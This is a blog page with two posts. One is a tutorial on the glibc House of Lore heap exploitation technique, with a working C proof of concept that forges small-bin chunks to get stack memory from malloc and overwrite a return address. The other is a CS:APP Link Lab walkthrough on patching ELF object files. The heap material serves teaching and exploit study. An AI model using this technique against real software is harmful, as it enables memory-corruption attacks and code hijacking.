Pwn进你的心

House Of Lore-原理

Posted on 2022-03-10 Edited on 2022-04-06 In HouseOfSeries 6.1k 6 mins.

House Of Lore

House of Lore 攻击与 Glibc 堆管理中的 Small Bin 的机制紧密相关

House of Lore 可以实现分配任意指定位置的 chunk，从而修改任意地址的内存
House of Lore 利用的前提是需要控制 Small Bin Chunk 的bk指针，并且控制指定位置 chunk 的fd指针

House Of Lore 利用姿势

如果我们可以把 small bin 中最后一个 chunk 的 bk 改为指向我们指定内存地址处的 fake chunk，并且同时绕过之后 bck->fd != victim 的检测（即保证 fake chunk 的 fd 指向 victim），那么在 victim 被取出之后，small bin 的 bk 就恰好指向我们构造的 fake chunk，下一次同样大小的申请便会把它分配出来

案例：（Ubuntu 14.04.4 - 32bit - glibc-2.23）

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/*
 * Hijack target used by main(): prints a marker line and terminates the
 * process with exit status 0, so it never returns to its caller.
 */
void jackpot()
{
  puts("Nice jump d00d");
  exit(0);
}

/*
 * House of Lore walkthrough (small-bin bk corruption).
 *
 * Steps, in order:
 *   1. allocate `victim` and lay out two fake chunks in stack buffers;
 *   2. free `victim`, then issue a larger request so the allocator sorts it
 *      into a bin;
 *   3. emulate the bug by overwriting victim->bk with the first fake chunk;
 *   4. call malloc(100) twice; the second call is expected to hand back
 *      memory inside stack_buffer_1;
 *   5. write the address of jackpot() through that pointer.
 *
 * The order of the malloc/free calls is the demonstration itself and must
 * not be changed. argc/argv are unused.
 */
int main(int argc, char * argv[]){

  /* Fake chunk #1, used as [0]=prev_size, [1]=size, [2]=fd, [3]=bk. */
  intptr_t* stack_buffer_1[4] = {0};
  /* Fake chunk #2; only its fd slot (index 2) is ever written. */
  intptr_t* stack_buffer_2[3] = {0};

  fprintf(stderr, "Allocating the victim chunk\n");
  intptr_t *victim = malloc(100);
  fprintf(stderr, "Allocated the first small chunk on the heap at %p\n", victim);

  // victim-WORD_SIZE because we need to remove the header size in order to have the absolute address of the chunk
  intptr_t *victim_chunk = victim-2;

  fprintf(stderr, "stack_buffer_1 at %p\n", (void*)stack_buffer_1);
  fprintf(stderr, "stack_buffer_2 at %p\n", (void*)stack_buffer_2);

  /* Fix: these messages previously lacked a trailing newline / separating
     space between the concatenated literals ("corruptedin", "withthe"). */
  fprintf(stderr, "Create a fake chunk on the stack\n");
  fprintf(stderr, "Set the fwd pointer to the victim_chunk in order to bypass the check of small bin corrupted "
         "in second to the last malloc, which putting stack address on smallbin list\n");
  stack_buffer_1[0] = 0; /* presize */
  stack_buffer_1[1] = 0; /* size */
  stack_buffer_1[2] = victim_chunk; /* FD */

  fprintf(stderr, "Set the bk pointer to stack_buffer_2 and set the fwd pointer of stack_buffer_2 to point to stack_buffer_1 "
         "in order to bypass the check of small bin corrupted in last malloc, which returning pointer to the fake "
         "chunk on stack\n");
  stack_buffer_1[3] = (intptr_t*)stack_buffer_2; // chunk1->BK => chunk2->head
  stack_buffer_2[2] = (intptr_t*)stack_buffer_1; // chunk2->FD => chunk1->head

  fprintf(stderr, "Allocating another large chunk in order to avoid consolidating the top chunk with "
         "the small one during the free()\n");
  void *p5 = malloc(1000); // keeps victim from being merged into the top chunk
  fprintf(stderr, "Allocated the large chunk on the heap at %p\n", p5);

  fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
  free((void*)victim);

  /* Deliberate reads of freed memory: the demo prints the allocator's link
     words stored in the chunk's user area. */
  fprintf(stderr, "\nIn the unsorted bin the victim's fwd and bk pointers are nil\n");
  fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
  fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

  fprintf(stderr, "Now performing a malloc that can't be handled by the UnsortedBin, nor the small bin\n");
  fprintf(stderr, "This means that the chunk %p will be inserted in front of the SmallBin\n", victim);

  void *p2 = malloc(1200);
  fprintf(stderr, "The chunk that can't be handled by the unsorted bin, nor the SmallBin has been allocated to %p\n", p2);

  fprintf(stderr, "The victim chunk has been sorted and its fwd and bk pointers updated\n");
  fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
  fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

  //------------VULNERABILITY-----------

  fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");

  victim[1] = (intptr_t)stack_buffer_1; // victim->bk is pointing to stack

  //------------------------------------

  fprintf(stderr, "Now allocating a chunk with size equal to the first one freed\n");
  fprintf(stderr, "This should return the overwritten victim chunk and set the bin->bk to the injected victim->bk pointer\n");

  /* The result is not used; the call itself is what advances the bin. */
  void *p3 = malloc(100);

  fprintf(stderr, "This last malloc should trick the glibc malloc to return a chunk at the position injected in bin->bk\n");
  char *p4 = malloc(100);
  fprintf(stderr, "p4 = malloc(100)\n");

  /* %p requires a void * argument, hence the explicit casts below. */
  fprintf(stderr, "\nThe fwd pointer of stack_buffer_2 has changed after the last malloc to %p\n",
         (void*)stack_buffer_2[2]);

  fprintf(stderr, "\np4 is %p and should be on the stack!\n", (void*)p4); // this chunk will be allocated on stack
  intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcode
  /* Fix: copy exactly sizeof sc bytes. The former hard-coded 8 read past the
     end of `sc` wherever intptr_t is 4 bytes wide (e.g. a 32-bit build).
     NOTE(review): the +40 offset is tied to one particular stack layout --
     confirm it for the target being demonstrated. */
  memcpy((p4+40), &sc, sizeof sc); // This bypasses stack-smash detection since it jumps over the canary
}

简单复述一下这个过程：

首先申请了一个在 fastbin 范围内的 victim chunk，然后再在栈上构造了一个 fake chunk（fake chunk 为 stack_buffer_1，还需要一个 stack_buffer_2 来打掩护）
为了绕过检测，设置 stack_buffer_1 的 BK 指针指向 stack_buffer_2，设置 stack_buffer_2 的 FD 指针指向 stack_buffer_1
接下来先 malloc 一个chunk，防止 free 之后与 top chunk 合并，然后 free 掉 victim，这时候 victim 会被放到 fastbin 中
接下来再去 malloc 一个 large chunk，会触发 fastbin 的合并，然后放到 unsorted bin 中，这样我们的 victim chunk 就放到了 unsorted bin 中，然后最终被 unsorted bin 分配到 small bin 中
在 victim chunk 的BK指针中写入fake chunk（small bin是基于BK，从后向前申请的）
再次申请 victim chunk（同时 fake chunk 进入small bin），最后申请 fake chunk

利用条件：

程序可修改 small bins 中 free chunk 的 bk 指针
对应伪造 fake chunk 的区域有一定控制权（可以伪造 fakechunk->FD 为 victim_chunk）

关于 Small Bin 分配的利用点

/* Excerpt of glibc's small-bin allocation path: take the chunk at the tail of
   the matching small bin, unlink it, and return its user pointer.  */
if (in_smallbin_range (nb))
    // Only taken when the normalized request size falls in the small-bin range
    {
      idx = smallbin_index (nb);
      bin = bin_at (av, idx);

      if ((victim = last (bin)) != bin)
          // last (bin) gives the chunk at the tail of the bin; equal to bin means the bin is empty
        {
          bck = victim->bk; /* exploitation point: bk is read straight from the free chunk */
	  if (__glibc_unlikely (bck->fd != victim))
          // Integrity check: bck->fd must point back at victim, to catch forged links
	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
          set_inuse_bit_at_offset (victim, nb);
          bin->bk = bck;
          bck->fd = bin;

          if (av != &main_arena)
	    set_non_main_arena (victim);
          check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
	  /* While we're here, if we see other chunks of the same size,
	     stash them in the tcache.  */
	  size_t tc_idx = csize2tidx (nb);
	  if (tcache && tc_idx < mp_.tcache_bins)
	    {
	      mchunkptr tc_victim;

	      /* While bin not empty and tcache not full, copy chunks over.  */
	      while (tcache->counts[tc_idx] < mp_.tcache_count
		     && (tc_victim = last (bin)) != bin)
		{
		  if (tc_victim != 0)
		    {
		      /* Note: no bck->fd check is performed on this path.  */
		      bck = tc_victim->bk;
		      set_inuse_bit_at_offset (tc_victim, nb);
		      if (av != &main_arena)
			set_non_main_arena (tc_victim);
		      bin->bk = bck;
		      bck->fd = bin;

		      tcache_put (tc_victim, tc_idx);
	            }
		}
	    }
#endif
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }
    }

漏洞的问题就在于bck = victim->bk，这句话将这个 chunk 的BK提取了出来，并且在之后使得bin->bk = bck ，这样的话BK指针所指向的 chunk 就被放入了 smallbin，之后的 malloc 就可以将其 malloc 出来了

版本对 House Of Lore 的影响

libc-2.23（只有上文提及的基础检查）

libc-2.27（只有上文提及的基础检查，但是需要绕过 tcache）

1	if (__glibc_unlikely (bck->fd != victim))

检查 fakechunk->FD 是不是 victim_chunk

libc-2.31（House Of Lore 已经失效）

CSapp-Link Lab

Posted on 2022-03-09 Edited on 2022-10-10 In Knowledge 39k 35 mins.

Link Lab

CMU无此实验，HIT增加

每个实验阶段考察 ELF 文件组成与程序链接过程的不同方面知识

阶段1：全局变量 <=> 数据节
阶段2：指令 <=> 代码节
阶段3：符号解析
阶段4：switch语句与重定位
阶段5：重定位

实验文件

main.o：主程序的可重定位目标模块（实验中无需修改）
phase1.o …….. phase5.o：各阶段实验所针对的二进制可重定位目标模块，需在相应实验阶段中予以修改或补充
linkbombn：验证文件

在实验中的每一阶段，按照阶段的目标要求修改相应可重定位二进制目标模块 phasen.o 后，使用如下命令生成可执行程序 linkbomb：

linux > gcc -m32 -o linkbomb main.o phase[n].o
linux > ./linkbomb

使用工具

hexedit

hexedit 不仅仅是十六进制编辑器，它提供了获取文件差异的信息，可用于比较二进制文件，它的用户界面基于 ncurses

我们可以像下面这样安装它：（可能需要 root 权限）

1	linux > apt install hexedit

打开终端输入以下指令即可运行：

1	linux > hexedit filename

用方向键移动，ctrl+w 保存，ctrl+x 保存并退出，ctrl+c 不保存直接退出，更多用法见 man hexedit

readelf

-a --all 等同于同时使用：-h -l -S -s -r -d -V -A -I
-h --file-header 显示ELF文件头
-l --program-headers 显示程序头
-S --section-headers 显示节头
-t --section-details 显示节详细信息
-s --syms 显示符号表（symbol table）
-r --relocs 显示重定位信息
-d --dynamic 显示动态节（dynamic section）
-x --hex-dump=<节号或节名> 以字节形式显示输出指定节的内容
-p --string-dump=<节号或节名> 以字符串形式显示输出指定节的内容
-R --relocated-dump=<节号或节名> 以重定位后的字节形式显示输出指定节内容

符号相关知识

符号表

在计算机科学中，符号表是一种用于语言翻译器（例如：编译器和解释器）中的数据结构，在符号表中，程序源代码中的每个标识符都和它的声明或使用信息绑定在一起，比如其数据类型、作用域以及内存地址

/* One entry of a 32-bit ELF symbol table, in the simplified bit-field form
   used by this write-up. */
typedef struct {
        Elf32_Word      st_name;        /* offset of the symbol's name string inside .strtab */
        Elf32_Word      st_value;       /* offset within its section; a virtual address in executables */
        Elf32_Word      st_size;        /* size in bytes of the object the symbol names */
        unsigned char   type: 4;        /* kind of target: data, function, source file, section */
        unsigned char   binding: 4;     /* symbol class: global, local, weak */
        unsigned char   st_other;
        Elf32_Section   st_shndx;       /* section holding the target, or a special value */
}Elf32_Sym;

散列表

散列表是用来实现符号表的一种常用技术，编译器可能会使用一个很大的符号表来包含所有的符号，或是针对不同的作用域使用层次结构的多个独立的符号表

符号

Global symbols（模块内部定义的全局符号）
- 由模块m定义并能被其他模块引用的符号（非static函数，非static全局变量）
External symbols（外部定义的全局符号）
- 由其他模块定义并被模块m引用的全局符号
Local symbols（本模块的局部符号）
- 仅由模块m定义和引用的本地符号（带有static的函数和全局变量）
- 注意：局部变量不会在过程外被引用（分配在栈中），因此不是符号定义

符号变量

自动变量（动态局部变量）：auto

离开函数，值就消失
不写 static 就默认是 auto

静态局部变量：static

离开函数，值仍然保留
变量的值只在函数内部生效
带有 static 的变量只会初始化一次（数据存储在 data 段）
当上一级函数多次调用本函数时，带有 static 的变量数值不变（并且不会进行初始化）

寄存器变量：register

离开函数，值就消失
变量的值只在函数内部生效

全局变量：在 main 之外

允许 main 中所有函数访问
允许外部其他文件访问

静态全局变量：在 main 之外，static

允许 main 中所有函数访问
变量的值只在文件内部生效

节简析

使用目标文件的节头表，可以定位文件的所有节，节头表是 Elf32_Shdr 或 Elf64_Shdr 结构的数组

节头

/* One entry of the 32-bit ELF section header table. */
typedef struct {
        Elf32_Word      sh_name; /* section name: an index into the section-header string table, locating a NUL-terminated string (fix: type was misspelled elf32_Word) */
        Elf32_Word      sh_type; /* categorizes the section's contents and semantics */
        Elf32_Word      sh_flags; /* 1-bit flags describing miscellaneous attributes */
        Elf32_Addr      sh_addr; /* address of the section's first byte, if the section appears in the process memory image */
        Elf32_Off       sh_offset; /* byte offset from the start of the file to the section's first byte */
        Elf32_Word      sh_size; /* size of the section */
        Elf32_Word      sh_link; /* section header table index link; meaning depends on the section type */
        Elf32_Word      sh_info; /* extra information; meaning depends on the section type */
        Elf32_Word      sh_addralign; /* address alignment constraint, for sections that have one */
        Elf32_Word      sh_entsize; /* size of each entry, for sections holding a table of fixed-size entries */
} Elf32_Shdr;

/* One entry of the 64-bit ELF section header table; same fields as the
   32-bit layout, with wider types for flags, address, offset and sizes. */
typedef struct {
        Elf64_Word      sh_name;        /* section name, as an index into the section-header string table */
        Elf64_Word      sh_type;        /* categorizes the section's contents and semantics */
        Elf64_Xword     sh_flags;       /* 1-bit attribute flags */
        Elf64_Addr      sh_addr;        /* address of the first byte when the section is part of the memory image */
        Elf64_Off       sh_offset;      /* file offset of the section's first byte */
        Elf64_Xword     sh_size;        /* size of the section */
        Elf64_Word      sh_link;        /* section header table index link; meaning depends on sh_type */
        Elf64_Word      sh_info;        /* extra information; meaning depends on sh_type */
        Elf64_Xword     sh_addralign;   /* address alignment constraint */
        Elf64_Xword     sh_entsize;     /* entry size, for sections holding fixed-size entries */
} Elf64_Shdr;

参考：节 - 链接程序和库指南

节分配

节简述

ELF头：包括16字节的标识信息，文件类型（.o，exec，.so），机器类型（如Intel 80386），节头表的偏移，节头表的表项大小及表项个数
.text节：编译后的代码部分
.rodata节：只读数据，如 printf 用到的格式串，switch 跳转表等
.data节：已初始化的全局变量和静态变量
.bss节：未初始化全局变量和静态变量，仅是占位符，不占据任何磁盘空间，区分初始化和非初始化是为了空间效率
.symtab节：存放函数和全局变量（符号表）的信息，它不包括局部变量
.rel.text节：.text节的重定位信息，用于重新修改代码段的指令中的地址信息
.debug节：调试用的符号表（gcc -g）
.strtab节：包含 .symtab节和 .debug节中的符号及节名

示例（可能会有不同，比如：在我的电脑上 .data 为第4节）

ABS：表示不该被重定位
UND：表示未定义
COM：表示未初始化数据（.bss）
对于 COM 符号：value 字段表示对齐要求，size 字段给出最小大小

编译器驱动程序

编译器驱动程序的工作：调用语言预处理器，编译器，汇编器，链接器

详细过程：

预处理阶段：预处理器（cpp）根据以字符 “#” 开头的命令，修改原始的 C 程序（比如 hello.c 中第 1 行的#include命令告诉预处理器读取系统头文件 stdio.h 的内容）并把它直接插入程序文本中，结果就得到了另一个 C 程序
- 通常是以 .i 作为文件扩展名
- 所谓的头文件，里面装的其实就是函数声明（libc库中的函数：scanf，printf 等）
编译阶段：编译器（cc1）将文本文件 hello.i 翻译成文本文件 hello.s，它包含一个汇编语言程序
- .s 文件其实就是装有汇编语言的文件
汇编阶段：汇编器（as）将 hello.s 翻译成机器语言指令，把这些指令打包成一种叫做可重定位目标程序（relocatable object program）的格式，并将结果保存在目标文件 hello.o 中
- hello.o 文件是一个二进制文件，它包含的 17 个字节是函数 main 的指令编码
- 如果我们在文本编辑器中打开 hello.o文件，将看到一堆乱码（二进制）
链接阶段：链接器（ld）就负责处理合并各个 hello.o 文件，结果就得到 hello 文件，它是一个可执行目标文件（或者简称为可执行文件），可以被加载到内存中，由系统执行
- 请注意，hello 程序调用了 printf 函数，它是每个 C 编译器都提供的标准 C 库中的一个函数
- printf 函数存在于一个名为 printf.o 的单独的预编译好了的目标文件中，而这个文件必须以某种方式合并到我们的 hello.o 程序中
- 通过修改 hello.o 可以影响最终文件 hello 的效果

强符号与弱符号

在C语言中：

函数和初始化的全局变量（包括显式初始化为0）是强符号
未初始化的全局变量是弱符号

对于它们，下列三条规则适用：

同名的强符号只能有一个，否则链接器报“重复定义”错误
允许一个强符号和多个弱符号，但定义会选择强符号的
当有多个弱符号相同时，链接器选择最先出现那个，也就是与链接顺序有关

实验一

步骤一：使用 readelf 和 objdump 工具，首先确定 printf（具体为 puts ）输出函数的第2个调用参数对应的字符串地址（在 .data 节中）

步骤二：使用readelf 或 objdump 工具，查看 .data 节中的字符串内容并与未修改的 phase1.o 链接后程序输出的字符串比较，确定该字符串为修改的目标

步骤三：使用 hexedit 或自己写程序，将该字符串前若干字符替换为目标学号中的字符

实验一的程序框架：

#include <stdio.h>
#include "config.h" 
/* Hook for the phase under test; it has no initializer here, so it starts
   out null unless a linked phase module supplies a value. */
void (*phase)();
/* Runs the linked phase if there is one, otherwise prints a usage hint.
   Always returns 0. */
int main( int argc, const char* argv[] ) {
        if ( !phase ) {
               /* No phase module was linked in. */
               printf("To run lab, please link the relevant object module with the main module.\n");
               return 0;
        }
        (*phase)();
        return 0;
}

直接运行输出这个结果：

1
2

➜  [/home/ywhkkx/ex1.linklab/l1] ./linkbomb1 
173000209UVv00d3vyFALuMYjxuPCr5m38uiiwLQwlzRxr80BxYnv7r6zz9aChMvWou2DL9e4tc6EidF1olhqrhH3gxYChAckMo7uMXJHwSDfiEmlYH	hhJElIl RzCWKPcuNvdHAIt	h7487zkd39QJEm4Rqwyer	L 0gauz1N2w9g PyaHAl

现在先收集信息：

➜  [/home/ywhkkx/ex1.linklab/l1] readelf -s phase1.o

Symbol table '.symtab' contains 17 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 00000000     0 FILE    LOCAL  DEFAULT  ABS phase1.c
     2: 00000000     0 SECTION LOCAL  DEFAULT    2 
     3: 00000000     0 SECTION LOCAL  DEFAULT    4 
     4: 00000000     0 SECTION LOCAL  DEFAULT    5 
     5: 00000000   200 OBJECT  LOCAL  DEFAULT    4 ALJsLxmF // target
     6: 00000000     0 SECTION LOCAL  DEFAULT    6 
     7: 00000000     0 SECTION LOCAL  DEFAULT    8 
     8: 00000000     0 SECTION LOCAL  DEFAULT   10 
     9: 00000000     0 SECTION LOCAL  DEFAULT   11 
    10: 00000000     0 SECTION LOCAL  DEFAULT    9 
    11: 00000000     0 SECTION LOCAL  DEFAULT    1 
    12: 00000000    43 FUNC    GLOBAL DEFAULT    2 do_phase
    13: 00000000     0 FUNC    GLOBAL HIDDEN     8 __x86.get_pc_thunk.ax
    14: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND _GLOBAL_OFFSET_TABLE_ // GOT表
    15: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND puts
    16: 00000000     4 OBJECT  GLOBAL DEFAULT    6 phase

发现可疑目标：ALJsLxmF

Bind：LOCAL（局部符号）
Ndx：4（第4节 .data）
Value：0（节内偏移为0）
Type：OBJECT（全局变量）

局部全局变量，大小为 200，位于 .data 节，节内偏移为 0

接下来只需要查看 data 节在 .o 文件中的偏移是多少应该就可了：

➜  [/home/ywhkkx/ex1.linklab/l1] readelf -S phase1.o
There are 16 section headers, starting at offset 0x3f0:

节头：
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .group            GROUP           00000000 000034 000008 04     13  13  4
  [ 2] .text             PROGBITS        00000000 00003c 00002b 00  AX  0   0  1
  [ 3] .rel.text         REL             00000000 000328 000020 08   I 13   2  4
  [ 4] .data             PROGBITS        00000000 000080 0000c8 00  WA  0   0 32
  [ 5] .bss              NOBITS          00000000 000148 000000 00  WA  0   0  1
  [ 6] .data.rel.local   PROGBITS        00000000 000148 000004 00  WA  0   0  4

.data节偏移为“0x80”，在 HexEdit 中定位偏移为“0x80+0x0”（节偏移+节内偏移）

00000000   7F 45 4C 46  01 01 01 00  00 00 00 00  00 00 00 00  .ELF............
00000010   01 00 03 00  01 00 00 00  00 00 00 00  00 00 00 00  ................
00000020   F0 03 00 00  00 00 00 00  34 00 00 00  00 00 28 00  ........4.....(.
00000030   10 00 0F 00  01 00 00 00  08 00 00 00  55 89 E5 53  ............U..S
00000040   83 EC 04 E8  FC FF FF FF  05 01 00 00  00 8D 90 11  ................
00000050   00 00 00 83  EC 0C 52 89  C3 E8 FC FF  FF FF 83 C4  ......R.........
00000060   10 90 8B 5D  FC C9 C3 00  00 00 00 00  00 00 00 00  ...]............
00000070   00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ................
00000080   37 30 6C 4C  39 46 39 09  39 68 6B 52  58 55 38 41  70lL9F9.9hkRXU8A
00000090   31 31 37 33  30 30 30 32  30 39 55 56  76 30 30 64  1173000209UVv00d
000000A0   33 76 79 46  41 4C 75 4D  59 6A 78 75  50 43 72 35  3vyFALuMYjxuPCr5
000000B0   6D 33 38 75  69 69 77 4C  51 77 6C 7A  52 78 72 38  m38uiiwLQwlzRxr8
000000C0   30 42 78 59  6E 76 37 72  36 7A 7A 39  61 43 68 4D  0BxYnv7r6zz9aChM
000000D0   76 57 6F 75  32 44 4C 39  65 34 74 63  36 45 69 64  vWou2DL9e4tc6Eid
000000E0   46 31 6F 6C  68 71 72 68  48 33 67 78  59 43 68 41  F1olhqrhH3gxYChA
000000F0   63 6B 4D 6F  37 75 4D 58  4A 48 77 53  44 66 69 45  ckMo7uMXJHwSDfiE
00000100   6D 6C 59 48  09 68 68 4A  45 6C 49 6C  20 52 7A 43  mlYH.hhJElIl RzC
00000110   57 4B 50 63  75 4E 76 64  48 41 49 74  09 68 37 34  WKPcuNvdHAIt.h74
00000120   38 37 7A 6B  64 33 39 51  4A 45 6D 34  52 71 77 79  87zkd39QJEm4Rqwy
00000130   65 72 09 4C  20 30 67 61  75 7A 31 4E  32 77 39 67  er.L 0gauz1N2w9g
00000140   20 50 79 61  48 41 6C 00  00 00 00 00  8B 04 24 C3   PyaHAl.......$.
00000150   00 47 43 43  3A 20 28 55  62 75 6E 74  75 20 37 2E  .GCC: (Ubuntu 7.
00000160   33 2E 30 2D  31 36 75 62  75 6E 74 75  33 29 20 37  3.0-16ubuntu3) 7
00000170   2E 33 2E 30  00 00 00 00  14 00 00 00  00 00 00 00  .3.0............
---  phase1.o       --0x0/0x670------------------------------------------------

可以发现 printf 并没有从变量 ALJsLxmF 的头部开始打印，对原字符串进行搜索，发现偏移多了“0x11”，利用 objdump 反汇编进行检查：

➜  [/home/ywhkkx/ex1.linklab/l1] objdump -d phase1.o

phase1.o：     文件格式 elf32-i386


Disassembly of section .text:

00000000 <do_phase>:
   0:	55                   	push   %ebp
   1:	89 e5                	mov    %esp,%ebp
   3:	53                   	push   %ebx
   4:	83 ec 04             	sub    $0x4,%esp
   7:	e8 fc ff ff ff       	call   8 <do_phase+0x8>
   c:	05 01 00 00 00       	add    $0x1,%eax
  11:	8d 90 11 00 00 00    	lea    0x11(%eax),%edx 
      // lea 取源操作数地址的偏移量，并把它传送到目的操作数所在的单元
  17:	83 ec 0c             	sub    $0xc,%esp 
  1a:	52                   	push   %edx
  1b:	89 c3                	mov    %eax,%ebx
  1d:	e8 fc ff ff ff       	call   1e <do_phase+0x1e>
  22:	83 c4 10             	add    $0x10,%esp
  25:	90                   	nop
  26:	8b 5d fc             	mov    -0x4(%ebp),%ebx
  29:	c9                   	leave  
  2a:	c3                   	ret    

Disassembly of section .text.__x86.get_pc_thunk.ax:

00000000 <__x86.get_pc_thunk.ax>:
   0:	8b 04 24             	mov    (%esp),%eax
   3:	c3                   	ret

现在可以用 HexEdit 修改二进制数据了，我将把它改为 “YHellow”

1
2
3

➜  [/home/ywhkkx/ex1.linklab/l1] gcc -m32 -o linkbomb main.o phase1.o 
➜  [/home/ywhkkx/ex1.linklab/l1] ./linkbomb
YHellow

实验二

修改二进制可重定位目标文件 phase2.o 的代码节内容，使其与 main.o 链接后能够运行输出（且仅输出）自己的学号

#include <stdio.h>
#include "config.h" 
/* Hook for the phase under test; it has no initializer here, so it starts
   out null unless a linked phase module supplies a value. */
void (*phase)();
/* Runs the linked phase if there is one, otherwise prints a usage hint.
   Always returns 0. */
int main( int argc, const char* argv[] ) {
        if ( !phase ) {
               /* No phase module was linked in. */
               printf("To run lab, please link the relevant object module with the main module.\n");
               return 0;
        }
        (*phase)();
        return 0;
}

/*
 * Prints id followed by a newline, but only when id compares equal to MYID;
 * otherwise does nothing. The function's real name differs for every student.
 */
static void OUTPUT_FUNC_NAME(const char *id)
{
        if (strcmp(id, MYID) == 0)
                printf("%s\n", id);
}
/*
 * Phase entry point. The body is padding only: a run of nop instructions
 * that reserves room in the code section for the student to patch in the
 * instructions that do the real work.
 */
void do_phase()  {
        /* Fix: the listing used typographic quotes and an in-string ellipsis,
           neither of which compiles; __asm__ is also accepted in strict ISO
           mode, where plain asm is not a keyword. */
        __asm__( "nop\n\tnop\n\tnop\n\tnop\n\tnop\n\tnop\n\tnop\n\tnop\n\t" );
        /* ... the original listing trails off here: the distributed object
           file reserves more nops than the eight spelled out above. */
}

// 这个实验要求我们在 do_phase 中执行 OUTPUT_FUNC_NAME，打印 ID

步骤一：使用 objdump 工具，定位 phase2.o 代码节中包含对 printf（会被优化为 puts）输出函数调用的函数的偏移量地址

步骤二：使用 objdump 工具，分析 do_phase 函数的反汇编指令，确定加入对前述输出函数的调用指令的 .text 节中的偏移量位置

步骤三：构造调用输出函数（通过相对PC的偏移量）的机器指令，并替换 do_phase 函数中预留的 nop 指令偏移量

注：目标输出函数为 static 类型，可通过偏移量直接调用跳转（无需重定位）

直接执行程序：

1	➜ [/home/ywhkkx/ex1.linklab/l2] ./linkbomb2 // 啥也没有(本来也不该有)

信息收集：

1
2

➜  [/home/ywhkkx/ex1.linklab/l2] file linkbomb2 
linkbomb2: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=32fa54a562f55fda7e482d48180dc3e162fcea98, not stripped

发现 linkbomb2 是 dynamically，函数采用懒加载（利用PLT/GOT进行加载）

➜  [/home/ywhkkx/ex1.linklab/l2] readelf -s phase2.o  

Symbol table '.symtab' contains 22 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 00000000     0 FILE    LOCAL  DEFAULT  ABS phase2.c
     2: 00000000     0 SECTION LOCAL  DEFAULT    3 
     3: 00000000     0 SECTION LOCAL  DEFAULT    5 
     4: 00000000     0 SECTION LOCAL  DEFAULT    6 
     5: 00000000     0 SECTION LOCAL  DEFAULT    7 
     6: 00000000    65 FUNC    LOCAL  DEFAULT    3 yeDfwUkv
     7: 00000000     0 SECTION LOCAL  DEFAULT    8 
     8: 00000000     0 SECTION LOCAL  DEFAULT   10 
     9: 00000000     0 SECTION LOCAL  DEFAULT   11 
    10: 00000000     0 SECTION LOCAL  DEFAULT   13 
    11: 00000000     0 SECTION LOCAL  DEFAULT   14 
    12: 00000000     0 SECTION LOCAL  DEFAULT   12 
    13: 00000000     0 SECTION LOCAL  DEFAULT    1 
    14: 00000000     0 SECTION LOCAL  DEFAULT    2 
    15: 00000000     0 FUNC    GLOBAL HIDDEN    11 __x86.get_pc_thunk.bx
    16: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND _GLOBAL_OFFSET_TABLE_
    17: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND strcmp
    18: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND puts
    19: 00000041    48 FUNC    GLOBAL DEFAULT    3 do_phase // target
    20: 00000000     0 FUNC    GLOBAL HIDDEN    10 __x86.get_pc_thunk.ax
    21: 00000000     4 OBJECT  GLOBAL DEFAULT    8 phase

目标在：第3节，节内偏移为“0x41”的地方

➜  [/home/ywhkkx/ex1.linklab/l2] readelf -S phase2.o
There are 19 section headers, starting at offset 0x458:

节头：
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .group            GROUP           00000000 000034 000008 04     16  20  4
  [ 2] .group            GROUP           00000000 00003c 000008 04     16  15  4
  [ 3] .text             PROGBITS        00000000 000044 000071 00  AX  0   0  1

在 .text 节中找到指定的 do_phase 位置（需要修改的函数），偏移为“0x44+0x41”（注意，puts，strcmp等函数是要在链接重定向完成之后才能确定地址，在反汇编代码中显示出来）

00000000   7F 45 4C 46  01 01 01 00  00 00 00 00  00 00 00 00  .ELF............
00000010   01 00 03 00  01 00 00 00  00 00 00 00  00 00 00 00  ................
00000020   58 04 00 00  00 00 00 00  34 00 00 00  00 00 28 00  X.......4.....(.
00000030   13 00 12 00  01 00 00 00  0A 00 00 00  01 00 00 00  ................
00000040   0B 00 00 00  55 89 E5 53  83 EC 04 E8  FC FF FF FF  ....U..S........
00000050   81 C3 02 00  00 00 83 EC  08 8D 83 00  00 00 00 50  ...............P
00000060   FF 75 08 E8  FC FF FF FF  83 C4 10 85  C0 75 10 83  .u...........u..
00000070   EC 0C FF 75  08 E8 FC FF  FF FF 83 C4  10 EB 01 90  ...u............
00000080   8B 5D FC C9  C3 55 89 E5  E8 FC FF FF  FF 05 01 00  .]...U..........
00000090   00 00 90 90  90 90 90 90  90 90 90 90  90 90 90 90  ................
000000A0   90 90 90 90  90 90 90 90  90 90 90 90  90 90 90 90  ................

00000041 <do_phase>:
  41:	55                   	push   %ebp
  42:	89 e5                	mov    %esp,%ebp
  44:	e8 fc ff ff ff       	call   45 <do_phase+0x4>
  49:	05 01 00 00 00       	add    $0x1,%eax
  4e:	90					   nop
  4f:	90					   nop
  50:	90					   nop
  51:	90					   nop

在“0x85”（即 0x44+0x41）处发现 do_phase （55 89 e5 e8 …….. ）

先输入：gcc -m32 -o linkbomb2 main.o phase2.o 进行链接重定向（phase2.o 没有变）

